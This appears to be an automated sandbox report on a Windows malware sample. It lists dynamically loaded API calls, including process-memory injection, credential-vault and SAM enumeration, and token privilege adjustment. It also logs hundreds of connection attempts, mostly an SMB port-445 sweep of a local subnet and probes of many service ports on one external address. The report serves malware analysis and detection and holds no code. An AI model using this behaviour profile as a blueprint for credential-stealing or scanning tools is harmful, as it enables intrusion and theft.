- DynamicLoader: kernel32.dll/WaitForSingleObject - DynamicLoader: kernel32.dll/SetLastError - DynamicLoader: kernel32.dll/FreeEnvironmentStringsW - DynamicLoader: kernel32.dll/SetEnvironmentVariableA - DynamicLoader: kernel32.dll/SetEnvironmentVariableW - DynamicLoader: kernel32.dll/SetFilePointerEx - DynamicLoader: kernel32.dll/WriteConsoleW - DynamicLoader: kernel32.dll/GetOEMCP - DynamicLoader: kernel32.dll/CreateProcessW - DynamicLoader: kernel32.dll/SetConsoleOutputCP - DynamicLoader: kernel32.dll/GetConsoleOutputCP - DynamicLoader: kernel32.dll/MapViewOfFile - DynamicLoader: kernel32.dll/CreateFileMappingW - DynamicLoader: kernel32.dll/UnmapViewOfFile - DynamicLoader: kernel32.dll/VirtualQueryEx - DynamicLoader: kernel32.dll/VirtualQuery - DynamicLoader: kernel32.dll/VirtualFreeEx - DynamicLoader: kernel32.dll/ReadProcessMemory - DynamicLoader: kernel32.dll/VirtualAllocEx - DynamicLoader: kernel32.dll/VirtualProtectEx - DynamicLoader: kernel32.dll/VirtualAlloc - DynamicLoader: kernel32.dll/VirtualFree - DynamicLoader: kernel32.dll/VirtualProtect - DynamicLoader: kernel32.dll/WriteProcessMemory

Date: 2020-02-15 01:57:34


- DynamicLoader: kernel32.dll/ReadConsoleW - DynamicLoader: kernel32.dll/GetComputerNameExW - DynamicLoader: kernel32.dll/DeviceIoControl - DynamicLoader: kernel32.dll/OpenProcess - DynamicLoader: kernel32.dll/DuplicateHandle - DynamicLoader: kernel32.dll/GetCurrentProcess - DynamicLoader: kernel32.dll/FlushFileBuffers - DynamicLoader: kernel32.dll/GetCurrentDirectoryW - DynamicLoader: kernel32.dll/GetFileAttributesW - DynamicLoader: kernel32.dll/FindClose - DynamicLoader: kernel32.dll/ExpandEnvironmentStringsW - DynamicLoader: kernel32.dll/FindNextFileW - DynamicLoader: kernel32.dll/GetFileSizeEx - DynamicLoader: kernel32.dll/FindFirstFileW - DynamicLoader: kernel32.dll/FileTimeToDosDateTime - DynamicLoader: kernel32.dll/GetTempFileNameA - DynamicLoader: kernel32.dll/FileTimeToLocalFileTime - DynamicLoader: kernel32.dll/DeleteFileA - DynamicLoader: kernel32.dll/CreateFileA - DynamicLoader: kernel32.dll/GetTempPathA - DynamicLoader: kernel32.dll/GetFileInformationByHandle - DynamicLoader: kernel32.dll/GetCurrentDirectoryA - DynamicLoader: kernel32.dll/SetFilePointer - DynamicLoader: kernel32.dll/LocalFree - DynamicLoader: kernel32.dll/CreateThread - DynamicLoader: kernel32.dll/CloseHandle - DynamicLoader: kernel32.dll/TerminateThread - DynamicLoader: kernel32.dll/GetLastError - DynamicLoader: kernel32.dll/Sleep - DynamicLoader: kernel32.dll/CreateFileW - DynamicLoader: kernel32.dll/LocalAlloc - DynamicLoader: kernel32.dll/WriteFile - DynamicLoader: kernel32.dll/ReadFile - DynamicLoader: kernel32.dll/FileTimeToSystemTime - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: api-ms-win-core-synch-l1-2-0.DLL/InitializeCriticalSectionEx - DynamicLoader: kernel32.dll/FlsAlloc - DynamicLoader: kernel32.dll/FlsGetValue - DynamicLoader: kernel32.dll/FlsSetValue - DynamicLoader: kernel32.dll/LCMapStringEx - DynamicLoader: CRYPTBASE.dll/SystemFunction036 - DynamicLoader: rsaenh.DLL/CPExportKey - DynamicLoader: vaultcli.DLL/VaultEnumerateItemTypes - DynamicLoader: vaultcli.DLL/VaultEnumerateVaults - DynamicLoader: vaultcli.DLL/VaultOpenVault - DynamicLoader: vaultcli.DLL/VaultGetInformation - DynamicLoader: vaultcli.DLL/VaultEnumerateItems - DynamicLoader: vaultcli.DLL/VaultCloseVault - DynamicLoader: vaultcli.DLL/VaultFree - DynamicLoader: vaultcli.DLL/VaultGetItem - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: WINTRUST.dll/WinVerifyTrust - DynamicLoader: bcrypt.dll/BCryptOpenAlgorithmProvider - DynamicLoader: bcryptprimitives.dll/GetCipherInterface - DynamicLoader: bcrypt.dll/BCryptSetProperty - DynamicLoader: bcrypt.dll/BCryptGetProperty - DynamicLoader: bcryptprimitives.dll/GetCipherInterface - DynamicLoader: bcrypt.dll/BCryptGenerateSymmetricKey - DynamicLoader: bcrypt.dll/BCryptDecrypt - DynamicLoader: bcrypt.dll/BCryptCloseAlgorithmProvider

Date: 2020-02-15 01:57:34


- DynamicLoader: bcrypt.dll/BCryptDestroyKey - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: kernel32.dll/SetThreadUILanguage - DynamicLoader: kernel32.dll/CopyFileExW - DynamicLoader: kernel32.dll/IsDebuggerPresent - DynamicLoader: kernel32.dll/SetConsoleInputExeNameW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: kernel32.dll/SetThreadUILanguage - DynamicLoader: kernel32.dll/CopyFileExW - DynamicLoader: kernel32.dll/IsDebuggerPresent - DynamicLoader: kernel32.dll/SetConsoleInputExeNameW - DynamicLoader: kernel32.dll/SortGetHandle - DynamicLoader: kernel32.dll/SortCloseHandle - DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI - DynamicLoader: VSSAPI.DLL/CreateWriter - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: ole32.dll/CoTaskMemFree - DynamicLoader: ole32.dll/CoTaskMemAlloc - DynamicLoader: ADVAPI32.dll/LookupAccountNameW - DynamicLoader: sechost.dll/LookupAccountNameLocalW - DynamicLoader: ADVAPI32.dll/LookupAccountSidW - DynamicLoader: samcli.dll/NetLocalGroupGetMembers - DynamicLoader: SAMLIB.dll/SamConnect - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW - DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW - DynamicLoader: RPCRT4.dll/RpcStringFreeW - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: SAMLIB.dll/SamOpenDomain - DynamicLoader: SAMLIB.dll/SamLookupNamesInDomain - DynamicLoader: SAMLIB.dll/SamOpenAlias - DynamicLoader: SAMLIB.dll/SamFreeMemory - DynamicLoader: SAMLIB.dll/SamCloseHandle - DynamicLoader: SAMLIB.dll/SamGetMembersInAlias - DynamicLoader: netutils.dll/NetApiBufferFree - DynamicLoader: ole32.dll/CoCreateGuid - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: ole32.dll/StringFromCLSID - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: PROPSYS.dll/VariantToPropVariant - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: authZ.dll/AuthzInitializeContextFromToken - DynamicLoader: authZ.dll/AuthzInitializeObjectAccessAuditEvent2 - DynamicLoader: authZ.dll/AuthzAccessCheck - DynamicLoader: authZ.dll/AuthzFreeAuditEvent - DynamicLoader: authZ.dll/AuthzFreeContext - DynamicLoader: authZ.dll/AuthzInitializeResourceManager - DynamicLoader: authZ.dll/AuthzFreeResourceManager - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcBindingCreateW - DynamicLoader: RPCRT4.dll/RpcBindingBind - DynamicLoader: RPCRT4.dll/I_RpcMapWin32Status - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: ADVAPI32.dll/EventRegister - DynamicLoader: ADVAPI32.dll/EventUnregister - DynamicLoader: ADVAPI32.dll/EventWrite - DynamicLoader: ADVAPI32.dll/EventActivityIdControl - DynamicLoader: ADVAPI32.dll/EventWriteTransfer - DynamicLoader: ADVAPI32.dll/EventEnabled - DynamicLoader: kernel32.dll/RegCloseKey

Date: 2020-02-15 01:57:34


- DynamicLoader: kernel32.dll/RegSetValueExW - DynamicLoader: kernel32.dll/RegOpenKeyExW - DynamicLoader: kernel32.dll/RegQueryValueExW - DynamicLoader: kernel32.dll/RegCloseKey - DynamicLoader: wmisvc.dll/IsImproperShutdownDetected - DynamicLoader: Wevtapi.dll/EvtRender - DynamicLoader: Wevtapi.dll/EvtNext - DynamicLoader: Wevtapi.dll/EvtClose - DynamicLoader: Wevtapi.dll/EvtQuery - DynamicLoader: Wevtapi.dll/EvtCreateRenderContext - DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW - DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW - DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW - DynamicLoader: RPCRT4.dll/RpcBindingSetOption - DynamicLoader: RPCRT4.dll/RpcStringFreeW - DynamicLoader: RPCRT4.dll/NdrClientCall3 - DynamicLoader: RPCRT4.dll/RpcBindingFree - DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI - DynamicLoader: ole32.dll/CoCreateFreeThreadedMarshaler - DynamicLoader: ole32.dll/CoGetMarshalSizeMax - DynamicLoader: ole32.dll/CreateStreamOnHGlobal - DynamicLoader: ole32.dll/CoMarshalInterface - DynamicLoader: CRYPTSP.dll/CryptGenRandom - DynamicLoader: CRYPTSP.dll/CryptReleaseContext - DynamicLoader: KERNELBASE.dll/InitializeAcl - DynamicLoader: KERNELBASE.dll/AddAce - DynamicLoader: kernel32.dll/OpenProcessToken - DynamicLoader: KERNELBASE.dll/GetTokenInformation - DynamicLoader: KERNELBASE.dll/DuplicateTokenEx - DynamicLoader: KERNELBASE.dll/AdjustTokenPrivileges - DynamicLoader: kernel32.dll/SetThreadToken - DynamicLoader: KERNELBASE.dll/CheckTokenMembership - DynamicLoader: ole32.dll/CLSIDFromString - DynamicLoader: ole32.dll/CoCreateInstance - DynamicLoader: authZ.dll/AuthzInitializeContextFromToken - DynamicLoader: authZ.dll/AuthzInitializeResourceManager - DynamicLoader: authZ.dll/AuthzInitializeContextFromSid - DynamicLoader: authZ.dll/AuthzInitializeContextFromToken - DynamicLoader: authZ.dll/AuthzAccessCheck - DynamicLoader: authZ.dll/AuthzFreeContext - DynamicLoader: authZ.dll/AuthzFreeResourceManager - DynamicLoader: sechost.dll/LookupAccountSidLocalW - DynamicLoader: ole32.dll/CoGetClassObject - DynamicLoader: ole32.dll/CoGetCallContext - DynamicLoader: ole32.dll/StringFromGUID2 - DynamicLoader: ole32.dll/CoImpersonateClient - DynamicLoader: ole32.dll/CoRevertToSelf - DynamicLoader: ole32.dll/CoSwitchCallContext - DynamicLoader: ole32.dll/CoCreateGuid - DynamicLoader: kernel32.dll/ResolveDelayLoadedAPI - DynamicLoader: ole32.dll/CoInitializeEx - DynamicLoader: OLEAUT32.dll/ - DynamicLoader: ole32.dll/CoInitializeEx - DynamicLoader: ole32.dll/CoUninitialize

Attempts to connect to a dead IP:Port (560 unique times)

- IP: 192.168.0.0:9943 - IP: 192.168.0.0:3689 - IP: 192.168.0.109:445 - IP: 192.168.0.0:4848 - IP: 192.168.0.0:9418 - IP: 183.91.67.0:2081 (Indonesia)

Date: 2020-02-15 01:57:34


- IP: 183.91.67.0:2083 (Indonesia) - IP: 183.91.67.0:2082 (Indonesia) - IP: 183.91.67.0:2087 (Indonesia) - IP: 183.91.67.0:2086 (Indonesia) - IP: 192.168.0.0:8800 - IP: 192.168.0.27:445 - IP: 183.91.67.0:444 (Indonesia) - IP: 183.91.67.0:445 (Indonesia) - IP: 183.91.67.0:5000 (Indonesia) - IP: 183.91.67.0:443 (Indonesia) - IP: 192.168.0.0:90 - IP: 192.168.0.0:99 - IP: 192.168.0.0:8443 - IP: 192.168.0.0:6666 - IP: 192.168.0.113:445 - IP: 192.168.0.0:6664 - IP: 192.168.0.142:445 - IP: 192.168.0.189:445 - IP: 192.168.0.0:9200 - IP: 192.168.0.0:6668 - IP: 192.168.0.0:6060 - IP: 183.91.67.0:1099 (Indonesia) - IP: 183.91.67.0:9080 (Indonesia) - IP: 183.91.67.0:7779 (Indonesia) - IP: 192.168.0.138:445 - IP: 183.91.67.0:789 (Indonesia) - IP: 192.168.0.143:445 - IP: 192.168.0.115:445 - IP: 183.91.67.0:7777 (Indonesia) - IP: 192.168.0.35:445 - IP: 192.168.0.0:4443 - IP: 183.91.67.0:8140 (Indonesia) - IP: 192.168.0.0:8060 - IP: 183.91.67.0:8000 (Indonesia) - IP: 192.168.0.0:7548 - IP: 192.168.0.0:8181 - IP: 192.168.0.0:7547 - IP: 192.168.0.44:445 - IP: 192.168.0.12:445 - IP: 192.168.0.0:1599 - IP: 192.168.0.70:445 - IP: 192.168.0.171:445 - IP: 192.168.0.97:445 - IP: 183.91.67.0:5672 (Indonesia) - IP: 192.168.0.0:2000 - IP: 183.91.67.0:5901 (Indonesia) - IP: 183.91.67.0:5900 (Indonesia) - IP: 192.168.0.0:21379 - IP: 192.168.0.0:8112 - IP: 192.168.0.0:5000 - IP: 192.168.0.0:5001 - IP: 192.168.0.0:5007 - IP: 192.168.0.144:445 - IP: 192.168.0.0:5009 - IP: 192.168.0.159:445 - IP: 192.168.0.175:445 - IP: 192.168.0.104:445 - IP: 192.168.0.8:445 - IP: 183.91.67.0:8089 (Indonesia) - IP: 183.91.67.0:8088 (Indonesia) - IP: 183.91.67.0:2628 (Indonesia) - IP: 183.91.67.0:8083 (Indonesia) - IP: 183.91.67.0:8082 (Indonesia)

Date: 2020-02-15 01:57:34


- IP: 183.91.67.0:8081 (Indonesia) - IP: 183.91.67.0:8080 (Indonesia) - IP: 183.91.67.0:8087 (Indonesia) - IP: 183.91.67.0:8086 (Indonesia) - IP: 183.91.67.0:8085 (Indonesia) - IP: 183.91.67.0:8084 (Indonesia) - IP: 192.168.0.125:445 - IP: 192.168.0.184:445 - IP: 192.168.0.0:195 - IP: 192.168.0.167:445 - IP: 192.168.0.154:445 - IP: 183.91.67.0:8686 (Indonesia) - IP: 192.168.0.0:179 - IP: 183.91.67.0:88 (Indonesia) - IP: 192.168.0.0:1234 - IP: 192.168.0.90:445 - IP: 192.168.0.145:445 - IP: 192.168.0.0:28017 - IP: 192.168.0.0:10134 - IP: 192.168.0.0:2222 - IP: 183.91.67.0:1991 (Indonesia) - IP: 192.168.0.193:445 - IP: 192.168.0.74:445 - IP: 192.168.0.0:9100 - IP: 192.168.0.80:445 - IP: 192.168.0.55:445 - IP: 183.91.67.0:5009 (Indonesia) - IP: 192.168.0.0:1521 - IP: 183.91.67.0:2404 (Indonesia) - IP: 192.168.0.101:445 - IP: 192.168.0.0:10000 - IP: 192.168.0.0:10554 - IP: 192.168.0.0:9080 - IP: 192.168.0.0:9081 - IP: 192.168.0.56:445 - IP: 192.168.0.148:445 - IP: 183.91.67.0:4022 (Indonesia) - IP: 192.168.0.0:3260 - IP: 183.91.67.0:1741 (Indonesia) - IP: 183.91.67.0:5007 (Indonesia) - IP: 192.168.0.129:445 - IP: 192.168.0.0:8834 - IP: 192.168.0.0:33338 - IP: 183.91.67.0:5001 (Indonesia) - IP: 183.91.67.0:5055 (Indonesia) - IP: 192.168.0.174:445 - IP: 183.91.67.0:8800 (Indonesia) - IP: 183.91.67.0:195 (Indonesia) - IP: 183.91.67.0:9051 (Indonesia) - IP: 192.168.0.179:445 - IP: 183.91.67.0:7080 (Indonesia) - IP: 192.168.0.118:445 - IP: 192.168.0.5:445 - IP: 192.168.0.0:5672 - IP: 192.168.0.53:445 - IP: 192.168.0.42:445 - IP: 192.168.0.18:445 - IP: 192.168.0.0:50070 - IP: 192.168.0.0:9633 - IP: 192.168.0.98:445 - IP: 192.168.0.168:445 - IP: 192.168.0.61:445 - IP: 192.168.0.65:445

Date: 2020-02-15 01:57:34


- IP: 192.168.0.0:8012 - IP: 183.91.67.0:1962 (Indonesia) - IP: 192.168.0.0:8010 - IP: 183.91.67.0:3460 (Indonesia) - IP: 192.168.0.84:445 - IP: 192.168.0.0:5901 - IP: 192.168.0.0:5900 - IP: 192.168.0.0:20547 - IP: 192.168.0.0:445 - IP: 192.168.0.0:7474 - IP: 192.168.0.0:84 - IP: 192.168.0.158:445 - IP: 192.168.0.93:445 - IP: 183.91.67.0:3790 (Indonesia) - IP: 192.168.0.88:445 - IP: 192.168.0.0:443 - IP: 183.91.67.0:5938 (Indonesia) - IP: 192.168.0.0:1111 - IP: 183.91.67.0:2000 (Indonesia) - IP: 192.168.0.0:5357 - IP: 192.168.0.100:445 - IP: 192.168.0.0:13579 - IP: 192.168.0.137:445 - IP: 192.168.0.19:445 - IP: 192.168.0.0:25105 - IP: 192.168.0.0:7080 - IP: 183.91.67.0:1400 (Indonesia) - IP: 192.168.0.0:3310 - IP: 192.168.0.136:445 - IP: 192.168.0.86:445 - IP: 192.168.0.106:445 - IP: 183.91.67.0:9008 (Indonesia) - IP: 183.91.67.0:9009 (Indonesia) - IP: 192.168.0.0:1200 - IP: 183.91.67.0:9000 (Indonesia) - IP: 183.91.67.0:9001 (Indonesia) - IP: 183.91.67.0:9002 (Indonesia) - IP: 192.168.0.133:445 - IP: 192.168.0.177:445 - IP: 192.168.0.57:445 - IP: 192.168.0.0:37777 - IP: 192.168.0.38:445 - IP: 192.168.0.0:3389 - IP: 192.168.0.0:3388 - IP: 192.168.0.14:445 - IP: 192.168.0.62:445 - IP: 192.168.0.0:5222 - IP: 192.168.0.131:445 - IP: 183.91.67.0:311 (Indonesia) - IP: 183.91.67.0:3299 (Indonesia) - IP: 192.168.0.0:9600 - IP: 183.91.67.0:4157 (Indonesia) - IP: 183.91.67.0:2181 (Indonesia) - IP: 192.168.0.110:445 - IP: 192.168.0.127:445 - IP: 183.91.67.0:9091 (Indonesia) - IP: 183.91.67.0:9090 (Indonesia) - IP: 183.91.67.0:389 (Indonesia) - IP: 192.168.0.147:445 - IP: 183.91.67.0:4567 (Indonesia) - IP: 183.91.67.0:5560 (Indonesia) - IP: 192.168.0.1:445 - IP: 192.168.0.139:445

Date: 2020-02-15 01:57:34


- IP: 183.91.67.0:1723 (Indonesia) - IP: 192.168.0.0:8050 - IP: 192.168.0.156:445 - IP: 192.168.0.0:20000 - IP: 192.168.0.7:445 - IP: 183.91.67.0:8554 (Indonesia) - IP: 192.168.0.180:445 - IP: 192.168.0.49:445 - IP: 192.168.0.132:445 - IP: 192.168.0.0:89 - IP: 192.168.0.0:88 - IP: 192.168.0.108:445 - IP: 183.91.67.0:2222 (Indonesia) - IP: 192.168.0.0:83 - IP: 192.168.0.0:82 - IP: 192.168.0.0:81 - IP: 192.168.0.0:80 - IP: 192.168.0.0:8126 - IP: 192.168.0.121:445 - IP: 192.168.0.0:3299 - IP: 192.168.0.0:8123 - IP: 192.168.0.188:445 - IP: 192.168.0.59:445 - IP: 192.168.0.0:8880 - IP: 192.168.0.23:445 - IP: 192.168.0.82:445 - IP: 192.168.0.17:445 - IP: 183.91.67.0:4782 (Indonesia) - IP: 192.168.0.0:8069 - IP: 183.91.67.0:4786 (Indonesia) - IP: 183.91.67.0:3749 (Indonesia) - IP: 192.168.0.0:7890 - IP: 183.91.67.0:5800 (Indonesia) - IP: 183.91.67.0:5801 (Indonesia) - IP: 183.91.67.0:1521 (Indonesia) - IP: 192.168.0.163:445 - IP: 183.91.67.0:1911 (Indonesia) - IP: 192.168.0.0:32400 - IP: 192.168.0.0:264 - IP: 183.91.67.0:8020 (Indonesia) - IP: 192.168.0.0:5269 - IP: 183.91.67.0:84 (Indonesia) - IP: 192.168.0.123:445 - IP: 183.91.67.0:81 (Indonesia) - IP: 183.91.67.0:80 (Indonesia) - IP: 183.91.67.0:83 (Indonesia) - IP: 183.91.67.0:82 (Indonesia) - IP: 192.168.0.26:445 - IP: 192.168.0.51:445 - IP: 183.91.67.0:2480 (Indonesia) - IP: 192.168.0.50:445 - IP: 183.91.67.0:1599 (Indonesia) - IP: 183.91.67.0:7547 (Indonesia) - IP: 192.168.0.155:445 - IP: 183.91.67.0:7548 (Indonesia) - IP: 192.168.0.96:445 - IP: 192.168.0.124:445 - IP: 192.168.0.72:445 - IP: 192.168.0.0:1991 - IP: 192.168.0.0:9091 - IP: 192.168.0.0:9090 - IP: 183.91.67.0:1777 (Indonesia) - IP: 192.168.0.0:1962

Date: 2020-02-15 01:57:34


- IP: 192.168.0.9:445 - IP: 192.168.0.0:9008 - IP: 192.168.0.0:9009 - IP: 192.168.0.0:10081 - IP: 192.168.0.47:445 - IP: 192.168.0.0:9002 - IP: 192.168.0.0:9000 - IP: 192.168.0.0:9001 - IP: 192.168.0.0:16010 - IP: 192.168.0.10:445 - IP: 183.91.67.0:264 (Indonesia) - IP: 192.168.0.81:445 - IP: 192.168.0.141:445 - IP: 192.168.0.0:389 - IP: 192.168.0.0:8334 - IP: 192.168.0.37:445 - IP: 183.91.67.0:5601 (Indonesia) - IP: 192.168.0.0:5601 - IP: 192.168.0.0:8098 - IP: 192.168.0.0:8099 - IP: 183.91.67.0:8443 (Indonesia) - IP: 192.168.0.0:8090 - IP: 183.91.67.0:8112 (Indonesia) - IP: 192.168.0.0:3001 - IP: 192.168.0.152:445 - IP: 192.168.0.186:445 - IP: 192.168.0.95:445 - IP: 183.91.67.0:7657 (Indonesia) - IP: 192.168.0.0:8009 - IP: 192.168.0.0:8008 - IP: 192.168.0.13:445 - IP: 192.168.0.0:9869 - IP: 192.168.0.0:9944 - IP: 192.168.0.0:8001 - IP: 192.168.0.0:8000 - IP: 192.168.0.0:8002 - IP: 192.168.0.160:445 - IP: 192.168.0.0:5938 - IP: 192.168.0.0:1471 - IP: 192.168.0.0:1777 - IP: 192.168.0.0:5986 - IP: 192.168.0.0:5985 - IP: 192.168.0.0:5984 - IP: 192.168.0.75:445 - IP: 183.91.67.0:3780 (Indonesia) - IP: 192.168.0.1:80 - IP: 183.91.67.0:8834 (Indonesia) - IP: 192.168.0.0:2455 - IP: 192.168.0.0:18245 - IP: 183.91.67.0:6001 (Indonesia) - IP: 183.91.67.0:6000 (Indonesia) - IP: 192.168.0.0:7415 - IP: 183.91.67.0:8060 (Indonesia) - IP: 183.91.67.0:8069 (Indonesia) - IP: 192.168.0.30:445 - IP: 183.91.67.0:7071 (Indonesia) - IP: 183.91.67.0:7070 (Indonesia) - IP: 192.168.0.103:445 - IP: 192.168.0.112:445 - IP: 183.91.67.0:4911 (Indonesia) - IP: 183.91.67.0:8070 (Indonesia) - IP: 192.168.0.149:445 - IP: 183.91.67.0:2376 (Indonesia)

Date: 2020-02-15 01:57:34


- IP: 183.91.67.0:2375 (Indonesia) - IP: 183.91.67.0:554 (Indonesia) - IP: 183.91.67.0:8012 (Indonesia) - IP: 183.91.67.0:9081 (Indonesia) - IP: 192.168.0.0:4040 - IP: 192.168.0.29:445 - IP: 192.168.0.28:445 - IP: 183.91.67.0:1234 (Indonesia) - IP: 192.168.0.0:9191 - IP: 192.168.0.0:5555 - IP: 192.168.0.0:44818 - IP: 192.168.0.0:8866 - IP: 192.168.0.0:515 - IP: 192.168.0.41:445 - IP: 192.168.0.0:104 - IP: 192.168.0.0:102 - IP: 192.168.0.114:445 - IP: 192.168.0.172:445 - IP: 192.168.0.66:445 - IP: 183.91.67.0:4000 (Indonesia) - IP: 192.168.0.91:445 - IP: 192.168.0.0:6001 - IP: 192.168.0.0:6000 - IP: 192.168.0.0:5800 - IP: 192.168.0.0:5801 - IP: 192.168.0.0:9295 - IP: 192.168.0.76:445 - IP: 192.168.0.192:445 - IP: 192.168.0.15:445 - IP: 183.91.67.0:179 (Indonesia) - IP: 183.91.67.0:7890 (Indonesia) - IP: 192.168.0.153:445 - IP: 183.91.67.0:175 (Indonesia) - IP: 183.91.67.0:8126 (Indonesia) - IP: 183.91.67.0:8181 (Indonesia) - IP: 183.91.67.0:8123 (Indonesia) - IP: 192.168.0.0:37215 - IP: 192.168.0.24:445 - IP: 192.168.0.34:445 - IP: 192.168.0.185:445 - IP: 192.168.0.25:445 - IP: 192.168.0.0:9999 - IP: 192.168.0.1:113 - IP: 192.168.0.146:445 - IP: 192.168.0.2:445 - IP: 192.168.0.176:445 - IP: 192.168.0.0:8030 - IP: 192.168.0.87:445 - IP: 183.91.67.0:8866 (Indonesia) - IP: 192.168.0.173:445 - IP: 192.168.0.122:445 - IP: 192.168.0.0:311 - IP: 183.91.67.0:8334 (Indonesia) - IP: 192.168.0.194:445 - IP: 183.91.67.0:104 (Indonesia) - IP: 192.168.0.0:1723 - IP: 192.168.0.105:445 - IP: 183.91.67.0:3000 (Indonesia) - IP: 183.91.67.0:3001 (Indonesia) - IP: 192.168.0.119:445 - IP: 192.168.0.0:5055 - IP: 192.168.0.54:445 - IP: 192.168.0.0:1177

Date: 2020-02-15 01:57:34


- IP: 192.168.0.92:445 - IP: 192.168.0.134:445 - IP: 183.91.67.0:1515 (Indonesia) - IP: 192.168.0.0:3128 - IP: 192.168.0.0:7071 - IP: 192.168.0.0:7070 - IP: 192.168.0.0:1311 - IP: 183.91.67.0:8050 (Indonesia) - IP: 192.168.0.0:7777 - IP: 192.168.0.64:445 - IP: 192.168.0.0:3780 - IP: 192.168.0.0:7779 - IP: 192.168.0.0:4000 - IP: 192.168.0.0:554 - IP: 183.91.67.0:7474 (Indonesia) - IP: 192.168.0.128:445 - IP: 183.91.67.0:8008 (Indonesia) - IP: 192.168.0.0:8889 - IP: 192.168.0.0:8888 - IP: 192.168.0.60:445 - IP: 192.168.0.78:445 - IP: 192.168.0.0:8883 - IP: 192.168.0.0:4911 - IP: 192.168.0.0:8554 - IP: 192.168.0.162:445 - IP: 192.168.0.0:1911 - IP: 192.168.0.0:9151 - IP: 192.168.0.48:445 - IP: 183.91.67.0:9180 (Indonesia) - IP: 183.91.67.0:3310 (Indonesia) - IP: 183.91.67.0:515 (Indonesia) - IP: 192.168.0.0:10080 - IP: 192.168.0.0:9443 - IP: 192.168.0.89:445 - IP: 183.91.67.0:1010 (Indonesia) - IP: 192.168.0.68:445 - IP: 192.168.0.0:12345 - IP: 192.168.0.190:445 - IP: 183.91.67.0:8030 (Indonesia) - IP: 192.168.0.69:445 - IP: 183.91.67.0:3389 (Indonesia) - IP: 183.91.67.0:3388 (Indonesia) - IP: 183.91.67.0:3260 (Indonesia) - IP: 183.91.67.0:2455 (Indonesia) - IP: 183.91.67.0:3542 (Indonesia) - IP: 183.91.67.0:3541 (Indonesia) - IP: 192.168.0.191:445 - IP: 183.91.67.0:631 (Indonesia) - IP: 192.168.0.4:445 - IP: 192.168.0.135:445 - IP: 192.168.0.0:3541 - IP: 192.168.0.0:16993 - IP: 192.168.0.0:16992 - IP: 192.168.0.0:8070 - IP: 192.168.0.0:7657 - IP: 192.168.0.0:8101 - IP: 183.91.67.0:5555 (Indonesia) - IP: 192.168.0.130:445 - IP: 192.168.0.0:8081 - IP: 192.168.0.0:8080 - IP: 192.168.0.0:8083 - IP: 192.168.0.0:8082 - IP: 192.168.0.0:8085

Date: 2020-02-15 01:57:34


- IP: 192.168.0.0:8084 - IP: 192.168.0.0:8087 - IP: 192.168.0.0:8086 - IP: 192.168.0.0:8089 - IP: 192.168.0.0:8088 - IP: 192.168.0.0:631 - IP: 192.168.0.52:445 - IP: 192.168.0.178:445 - IP: 192.168.0.107:445 - IP: 183.91.67.0:5222 (Indonesia) - IP: 183.91.67.0:8098 (Indonesia) - IP: 183.91.67.0:8099 (Indonesia) - IP: 192.168.0.126:445 - IP: 192.168.0.71:445 - IP: 183.91.67.0:8090 (Indonesia) - IP: 183.91.67.0:9151 (Indonesia) - IP: 192.168.0.0:11211 - IP: 192.168.0.0:2083 - IP: 183.91.67.0:5984 (Indonesia) - IP: 192.168.0.0:2081 - IP: 192.168.0.0:2087 - IP: 183.91.67.0:4848 (Indonesia) - IP: 192.168.0.166:445 - IP: 192.168.0.150:445 - IP: 192.168.0.120:445 - IP: 192.168.0.181:445 - IP: 183.91.67.0:8002 (Indonesia) - IP: 183.91.67.0:8001 (Indonesia) - IP: 183.91.67.0:4040 (Indonesia) - IP: 183.91.67.0:6668 (Indonesia) - IP: 192.168.0.140:445 - IP: 183.91.67.0:6664 (Indonesia) - IP: 183.91.67.0:8009 (Indonesia) - IP: 183.91.67.0:6666 (Indonesia) - IP: 192.168.0.85:445 - IP: 192.168.0.182:445 - IP: 192.168.0.79:445 - IP: 192.168.0.0:9180 - IP: 183.91.67.0:8010 (Indonesia) - IP: 192.168.0.0:54138 - IP: 192.168.0.32:445 - IP: 192.168.0.0:8139 - IP: 192.168.0.67:445 - IP: 192.168.0.99:445 - IP: 192.168.0.0:444 - IP: 192.168.0.0:113 - IP: 183.91.67.0:6060 (Indonesia) - IP: 192.168.0.0:9051 - IP: 192.168.0.58:445 - IP: 192.168.0.102:445 - IP: 183.91.67.0:4664 (Indonesia) - IP: 192.168.0.94:445 - IP: 192.168.0.157:445 - IP: 192.168.0.164:445 - IP: 192.168.0.117:445 - IP: 192.168.0.0:2628 - IP: 183.91.67.0:1111 (Indonesia) - IP: 192.168.0.0:4782 - IP: 192.168.0.187:445 - IP: 192.168.0.0:4786 - IP: 192.168.0.0:23424 - IP: 183.91.67.0:1200 (Indonesia) - IP: 192.168.0.183:445

Date: 2020-02-15 01:57:34


